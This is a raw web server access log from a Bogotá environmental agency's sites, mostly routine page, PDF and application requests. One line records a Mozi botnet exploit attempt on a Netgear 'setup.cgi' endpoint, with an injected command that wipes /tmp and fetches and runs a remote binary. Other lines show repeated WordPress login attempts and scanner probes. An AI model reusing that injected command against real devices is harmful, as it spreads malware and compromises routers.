179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:42 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:43 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
179.19.1.201 - - [23/Feb/2023:05:39:43 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 36959
179.19.1.201 - - [23/Feb/2023:05:39:43 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
179.19.1.201 - - [23/Feb/2023:05:39:43 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
179.19.1.201 - - [23/Feb/2023:05:39:46 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:46 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 8532
179.19.1.201 - - [23/Feb/2023:05:39:48 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 8532
179.19.1.201 - - [23/Feb/2023:05:39:51 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 3843
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 57222
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:54 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:54 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
179.19.1.201 - - [23/Feb/2023:05:39:54 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1540
201.245.192.253 - - [23/Feb/2023:05:40:15 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:38:51 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58171
185.119.81.104 - - [23/Feb/2023:05:41:02 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:05:41:03 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
173.252.83.20 - - [23/Feb/2023:05:41:35 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
66.249.66.79 - - [23/Feb/2023:05:41:45 -0500] "-" 408 -
179.19.1.201 - - [23/Feb/2023:05:41:53 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25546
216.245.221.92 - - [23/Feb/2023:05:42:46 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:05:45:13 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:43:50 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:44:41 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
185.180.143.79 - - [23/Feb/2023:05:48:02 -0500] "GET /sugar_version.json HTTP/1.1" 404 1018
52.167.144.44 - - [23/Feb/2023:05:48:30 -0500] "GET /portaldeninos/wp-content/uploads/2020/11/La-Conejera-B-260x146.jpg HTTP/1.1" 200 13503
40.77.167.172 - - [23/Feb/2023:05:49:16 -0500] "GET /distrito-declara-alerta-fase-i-en-suroccidente-de-bogota-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 200 883
201.245.192.253 - - [23/Feb/2023:05:50:12 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:50:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
172.22.2.4 - - [23/Feb/2023:05:49:40 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
69.63.189.120 - - [23/Feb/2023:05:53:50 -0500] "GET /la-moda-circular-es-tendencia-nueva-apuesta-para-avanzar-en-la-sostenibilidad-del-sector-en-bogota.html HTTP/1.1" 206 796
202.164.131.190 - - [23/Feb/2023:05:53:51 -0500] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://202.164.131.190:34879/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 1019
172.22.2.4 - - [23/Feb/2023:05:53:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 28619
201.245.192.253 - - [23/Feb/2023:05:55:11 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:05:54:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:05:55:23 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
216.245.221.92 - - [23/Feb/2023:05:58:08 -0500] "HEAD / HTTP/1.1" 200 -
173.252.83.24 - - [23/Feb/2023:05:59:24 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
66.249.66.80 - - [23/Feb/2023:05:59:45 -0500] "-" 408 -
201.245.192.253 - - [23/Feb/2023:06:00:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.155.18.80 - - [23/Feb/2023:06:00:17 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
172.22.2.4 - - [23/Feb/2023:06:00:22 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:06:01:12 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
216.245.221.92 - - [23/Feb/2023:06:03:08 -0500] "HEAD / HTTP/1.1" 200 -
173.252.127.7 - - [23/Feb/2023:06:03:13 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
186.155.18.80 - - [23/Feb/2023:06:04:42 -0500] "GET /BLA/resoluciones/index.php HTTP/1.1" 200 13502
157.55.39.209 - - [23/Feb/2023:06:04:54 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12494
201.245.192.253 - - [23/Feb/2023:06:05:10 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.155.18.80 - - [23/Feb/2023:06:05:51 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2008%2F HTTP/1.1" 200 569644
186.155.18.80 - - [23/Feb/2023:06:06:37 -0500] "GET /BLA/resoluciones/AUTOS%202008/2063.pdf HTTP/1.1" 200 158636
172.22.2.4 - - [23/Feb/2023:06:06:12 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [23/Feb/2023:06:08:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:06:07:02 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
185.119.81.104 - - [23/Feb/2023:06:09:04 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:06:09:05 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3670
201.245.192.253 - - [23/Feb/2023:06:10:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
216.245.221.92 - - [23/Feb/2023:06:13:08 -0500] "HEAD / HTTP/1.1" 200 -
186.155.18.80 - - [23/Feb/2023:06:14:05 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2008%2F HTTP/1.1" 200 976272
186.155.18.80 - - [23/Feb/2023:06:14:15 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/2718.pdf HTTP/1.1" 200 296918
201.245.192.253 - - [23/Feb/2023:06:15:09 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
186.155.18.80 - - [23/Feb/2023:06:15:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/4375.pdf HTTP/1.1" 200 885296
216.245.221.92 - - [23/Feb/2023:06:18:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:06:18:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40781
201.245.192.253 - - [23/Feb/2023:06:18:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41592
201.245.192.253 - - [23/Feb/2023:06:20:08 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
185.119.81.104 - - [23/Feb/2023:06:22:24 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
185.119.81.104 - - [23/Feb/2023:06:22:25 -0500] "POST /portaldeninos/wp-login.php HTTP/1.1" 200 3650
40.77.167.233 - - [23/Feb/2023:06:22:55 -0500] "GET /Publicaciones/2022EE28876.pdf HTTP/1.1" 404 227
216.245.221.92 - - [23/Feb/2023:06:23:08 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:06:22:02 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.155.18.80 - - [23/Feb/2023:06:24:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
186.155.18.80 - - [23/Feb/2023:06:24:13 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2772.pdf HTTP/1.1" 200 545991
172.22.2.4 - - [23/Feb/2023:06:22:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59164
201.245.192.253 - - [23/Feb/2023:06:25:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.220.149.18 - - [23/Feb/2023:06:25:10 -0500] "GET /images/20%20de%20febrero%20panor\xc3\xa1mica%20de%20Bogot\xc3\xa1%20(1)%20(1).jpeg HTTP/1.1" 404 1034
201.221.172.39 - - [23/Feb/2023:06:25:22 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
201.221.172.39 - - [23/Feb/2023:06:25:22 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
201.221.172.39 - - [23/Feb/2023:06:25:22 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
173.252.107.18 - - [23/Feb/2023:06:26:52 -0500] "GET /calidad-del-aire-de-bogota-vuelve-a-verse-afectada-por-altas-concentraciones-de-material-particulado.html HTTP/1.1" 206 1152
173.252.107.3 - - [23/Feb/2023:06:26:52 -0500] "GET /transportadores-de-carga-conocieron-las-opciones-para-contaminar-menos-y-enrutarse-en-la-sostenibilidad.html HTTP/1.1" 206 1003
173.252.107.120 - - [23/Feb/2023:06:26:53 -0500] "GET /privados-y-distrito-inauguraron-vivero-en-la-reserva-van-der-hammen-con-capacidad-para-producir-50-mil-arboles-al-ano.html HTTP/1.1" 206 899
173.252.107.23 - - [23/Feb/2023:06:26:53 -0500] "GET /distrito-alcanza-ya-15-acuerdos-de-conservacion-por-174-02-hectareas-para-consolidar-varios-ecosistemas-estrategicos-de-bogota.html HTTP/1.1" 206 1061
66.249.66.79 - - [23/Feb/2023:06:27:00 -0500] "-" 408 -
173.252.107.3 - - [23/Feb/2023:06:27:11 -0500] "GET /bogota-lanza-la-red-colaborativa-de-microsensores-para-medir-la-calidad-del-aire-en-microambientes.html HTTP/1.1" 206 1008
216.245.221.92 - - [23/Feb/2023:06:28:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:06:28:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40781
201.245.192.253 - - [23/Feb/2023:06:28:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41592
162.55.35.116 - - [23/Feb/2023:06:28:49 -0500] "GET / HTTP/1.1" 200 4720
162.55.35.116 - - [23/Feb/2023:06:28:51 -0500] "GET / HTTP/1.1" 200 319
190.24.101.221 - - [23/Feb/2023:06:28:53 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 2515842
190.24.101.221 - - [23/Feb/2023:06:28:54 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
34.86.177.154 - - [23/Feb/2023:06:28:58 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 2515842
34.86.44.240 - - [23/Feb/2023:06:28:58 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 -
34.86.44.240 - - [23/Feb/2023:06:28:59 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 -
34.86.44.240 - - [23/Feb/2023:06:28:59 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 -
34.86.44.240 - - [23/Feb/2023:06:28:59 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 -
34.86.44.240 - - [23/Feb/2023:06:28:59 -0500] "HEAD /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 -
34.86.44.240 - - [23/Feb/2023:06:28:59 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 2515842
186.155.18.80 - - [23/Feb/2023:06:28:58 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2011%2F HTTP/1.1" 200 746823
216.8.252.36 - - [23/Feb/2023:06:29:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202016/1002.pdf HTTP/1.1" 200 2515842
186.155.18.80 - - [23/Feb/2023:06:29:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202011/5345.pdf HTTP/1.1" 200 566252
40.77.167.233 - - [23/Feb/2023:06:29:14 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202010/2477.pdf HTTP/1.1" 200 491595
172.22.2.4 - - [23/Feb/2023:06:27:52 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
173.252.107.16 - - [23/Feb/2023:06:29:51 -0500] "GET /indicadores-de-fauna-silvestre-en-el-observatorio-ambiental-de-bogota.html HTTP/1.1" 206 949
173.252.107.21 - - [23/Feb/2023:06:29:51 -0500] "GET /lluvias-y-vientos-aumentan-la-probabilidad-de-caida-de-arboles-en-bogota.html HTTP/1.1" 206 730
173.252.107.12 - - [23/Feb/2023:06:29:51 -0500] "GET /en-el-diamundialdelmedioambiente-distrito-ejercito-nacional-y-comunidad-plantaron-120-arboles-en-parque-nacional.html HTTP/1.1" 206 838
173.252.107.19 - - [23/Feb/2023:06:29:51 -0500] "GET /para-prevenir-riesgo-sobre-la-ciudadania-distrito-intervendra-eucalipto-de-gran-porte-en-usaquen.html HTTP/1.1" 206 841
201.245.192.253 - - [23/Feb/2023:06:30:07 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:06:28:42 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55079
168.119.253.6 - - [23/Feb/2023:06:30:23 -0500] "GET / HTTP/1.1" 200 319
168.119.253.6 - - [23/Feb/2023:06:30:23 -0500] "GET / HTTP/1.1" 200 4720
31.13.127.120 - - [23/Feb/2023:06:31:52 -0500] "GET /images/negocios-verdes-mayo-2022.jpg HTTP/1.1" 200 48000
173.252.107.1 - - [23/Feb/2023:06:32:48 -0500] "GET /images/reunion-planta-termovalorizacion-11-mayo.jpg HTTP/1.1" 200 34782
66.249.75.128 - - [23/Feb/2023:06:33:07 -0500] "-" 408 -
216.245.221.92 - - [23/Feb/2023:06:33:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:06:35:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
172.22.2.4 - - [23/Feb/2023:06:33:42 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.155.18.80 - - [23/Feb/2023:06:36:00 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2009%2F HTTP/1.1" 200 399860
186.155.18.80 - - [23/Feb/2023:06:36:05 -0500] "GET /BLA/resoluciones/AUTOS%202009/1720.pdf HTTP/1.1" 200 124898
172.22.2.4 - - [23/Feb/2023:06:34:32 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56251
216.245.221.92 - - [23/Feb/2023:06:38:08 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [23/Feb/2023:06:38:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40781
201.245.192.253 - - [23/Feb/2023:06:38:26 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 41592
186.155.18.80 - - [23/Feb/2023:06:39:34 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 1694101
66.249.66.79 - - [23/Feb/2023:06:39:45 -0500] "-" 408 -
181.59.3.84 - - [23/Feb/2023:06:39:58 -0500] "GET /secretaria-de-ambiente-advierte-sobre-falso-mensaje-para-inscripciones-al-programa-mujeres-que-reverdecen.html HTTP/1.1" 200 1039
201.245.192.253 - - [23/Feb/2023:06:40:05 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
181.59.2.50 - - [23/Feb/2023:06:40:26 -0500] "GET /secretaria-de-ambiente-advierte-sobre-falso-mensaje-para-inscripciones-al-programa-mujeres-que-reverdecen.html HTTP/1.1" 200 1039
186.155.18.80 - - [23/Feb/2023:06:40:34 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/2227.pdf HTTP/1.1" 200 604226
172.22.2.4 - - [23/Feb/2023:06:39:32 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [23/Feb/2023:06:40:22 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57453
216.245.221.92 - - [23/Feb/2023:06:43:08 -0500] "HEAD / HTTP/1.1" 200 -
186.155.74.60 - - [23/Feb/2023:06:44:17 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
186.155.74.60 - - [23/Feb/2023:06:44:18 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12172
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
186.155.74.60 - - [23/Feb/2023:06:44:19 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
186.155.74.60 - - [23/Feb/2023:06:44:22 -0500] "POST /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 16123
186.155.74.60 - - [23/Feb/2023:06:44:22 -0500] "GET /sipse/css/custom_css_sg_prime.css HTTP/1.1" 200 5201
186.155.74.60 - - [23/Feb/2023:06:44:22 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 200 85582
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 200 21242
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 200 155084
186.155.74.60 - - [23/Feb/2023:06:44:23 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
186.155.74.60 - - [23/Feb/2023:06:44:25 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 200 183
186.155.74.60 - - [23/Feb/2023:06:44:25 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 1471
186.155.74.60 - - [23/Feb/2023:06:44:25 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 61368
186.155.74.60 - - [23/Feb/2023:06:44:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:26 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:26 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:26 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.155.74.60 - - [23/Feb/2023:06:44:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1552
186.155.74.60 - - [23/Feb/2023:06:44:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31538
186.155.74.60 - - [23/Feb/2023:06:44:37 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 23019
201.245.192.253 - - [23/Feb/2023:06:45:03 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
51.255.62.7 - - [23/Feb/2023:06:45:25 -0500] "GET /Autoliquidacion/ HTTP/1.1" 200 6629
51.255.62.14 - - [23/Feb/2023:06:45:25 -0500] "GET /catalogoisis/ HTTP/1.1" 200 8575
186.155.74.60 - - [23/Feb/2023:06:45:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31421
186.155.74.60 - - [23/Feb/2023:06:45:38 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 37394
51.255.62.3 - - [23/Feb/2023:06:45:25 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 16331
185.119.81.104 - - [23/Feb/2023:06:46:23 -0500] "GET /portaldeninos/wp-login.php HTTP/1.1" 200 2592
186.102.31.42 - - [23/Feb/2023:06:46:24 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX19HE+xS0eFy9WJ934m7Q0+wgI8zYwC3ntIu2313VzYDS9/NqXLkMkCL&y=U2FsdGVkX19NkbslMHMDrZ89/jhVF2nFUhFFowKV7E4TQw1UlDVAqvmoQzFuQTUR HTTP/1.1" 200 30
186.102.31.42 - - [23/Feb/2023:06:46:24 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19cmFOAXPo0I0dCD6c4KG3Za1HDJFaxgNSIkY8htn6Z2yyvjaq7SeHU3/HntEf0fXXIWrQjlVt6k4KfR9OPQr5njJbVp3EY0J4=&u=U2FsdGVkX1+gsWV33bpew6uYZimRWluVDbwxOaJ8Y0ES6g2OLXphLaoHixiFR2oz&y=U2FsdGVkX19NkbslMHMDrZ89/jhVF2nFUhFFowKV7E4TQw1UlDVAqvmoQzFuQTUR HTTP/1.1" 200 97
